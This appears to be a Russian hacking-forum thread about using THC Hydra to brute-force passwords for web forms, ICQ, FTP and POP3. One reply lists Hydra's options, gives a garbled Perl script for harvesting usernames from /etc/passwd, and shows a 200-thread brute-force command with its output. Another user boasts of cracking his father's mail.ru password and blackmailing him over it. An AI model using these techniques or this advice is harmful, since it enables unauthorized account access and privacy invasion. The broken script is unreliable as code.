![]() |
Помогите с гидрой
Помогите с брутом гидра, дайти мануал на русском, или если не лень, приведите пример команды для брута форм POST и ICQ, с окошками вечно работал, а тут cmd, проблематично немного. Буду признателен)
|
Воспользуйся поиском.
На форуме много таких тем... |
...ъХ...,гидра аси уже давно не брутит((
Вот всё что нашел на винте. Итак параметры : -R -- востановить предыдущую/отменённую сессию. -S -- подклучаться с помощью ssl. -l -- логин к которому будет подбираться пароль(или -L список логинов причем к каждому логину из этого списка будет пробуваться только тот пароль который стаит на той же по номеру строчке в файле паролей , что и логин). -p -- пароль так же как к логину можно подбирать логины к паролю(или -P лист паролей). -e -- образовательные проверки, попробывать логин без пароля или попробовать пароль такой же как логин. -С -- формат файла login:pass без указания -L и -P. -M -- список серверов для парралельной атаки. -o -- записывать удачные попытки перебора в файл. -t -- количество одновременных подключений к серверу по дефолту 16. -w -- определяет максимальное время ожидания (в секундах) для ответов (по дефолту 30). -v/-V -- расширеный режим, показывает login+pass для каждой попытки. --||server||-- -- имя атакуемого сервера или можно использовать вместо его опцию -M. --||service||-- -- сервисе для атаки. Возможные вареанты : [telnet ftp pop3 imap smb smbnt http https http-proxy cisco cisco-enable ldap mssql mysql nntp vnc socks5 rexec snmp cvs icq pcnfs sapr3 ssh2 smtp-auth] --||OPT||-- -- для некоторых сервисов нужны специальные данные (смотреть README). Итак всё что нам нужно это нормальный парсер чтобы можно было делать листы login:pass из /etc/passwd или просто login доставал из /etc/passwd. Вот он : -++++++++++++++++++++++++++++++++++++++++++++-- #!/usr/bin/perl $in=$ARGV[0]; $out=$ARGV[1]; exit print "Use $0 $in $out;n" unless ($out); open(IN, "$in"); open(OUT, $out"); while(#;IN) { chomp; if(~/sh$/) { ($u, @undef) = split ":"; print OUT "$u#n"; } } close(IN); close(OUT); -+++++++++++++++++++++++++++++++++++++++++++-- После этого можно преступать к активным действиям : sh-2.05#./hydra -L /tmp/login.txt -P /tmp/pass.txt -t 200 (в зависимости от скорости хоста) www.target.com ftp Hydra v4.5 (c) 2004 by van Hauser / THC - use allowed only for legal purposes. Hydra (http://www.thc.org) starting at 2005-02-06 19:26:52 [DATA] 2 tasks, 1 servers, 85 login tries (l:1/p:85), ~42 tries per task [DATA] attacking service ftp on port 21 [STATUS] attack finished for www.target.com (waiting for childs to finish) [21][ftp] host: 84.252.136.7 login: password: Hydra (http://www.thc.org) finished at 2005-02-06 19:31:58 Вот с помощью таких инструментов бравые хакеры подбирают пароли к серверам |
Desr0w спасиб
Даже последнея версия под win гидры аси не брутит? Если да, то кто нибуть тогда знает брутофорс для асек с каторым можно было работать через cmd или удалённо? |
К сожалению не брутит.
Ищи скрипт для брута.. |
гидра не брутит аськи. и вообще она хреново брутит, если только исходники читать.
|
Kez ,ты верно не заметил что я уже 2 раза сказал ,что ГИДРА НЕ БРУТИТ АСЬКИ.
Меня она кста не подводила. |
Цитата:
Остальное можно и без гидры... Что ещё ещё брутить? Лучше уж самому накатать, чем в сорцах гидры разбираться, и думать почему у меня всевремя ничего не работает |
KEZ,согласен-своё всегда лучше.
Только вот с POP3 не соглашусь-полгода назад на mail.ru батино было увёл(потом просил mp3'шник за то ,чтобы не показал маме тайные переписки с сотрудницами фирмы):) Кста пасс был Vadim(большего от бати и не ожидал) |
Сколько пробовал - Pop3 брутфорс сразу же блокируют, и гидра после 20 попыток ответ на правильный пароль не получает
|
| Время: 06:04 |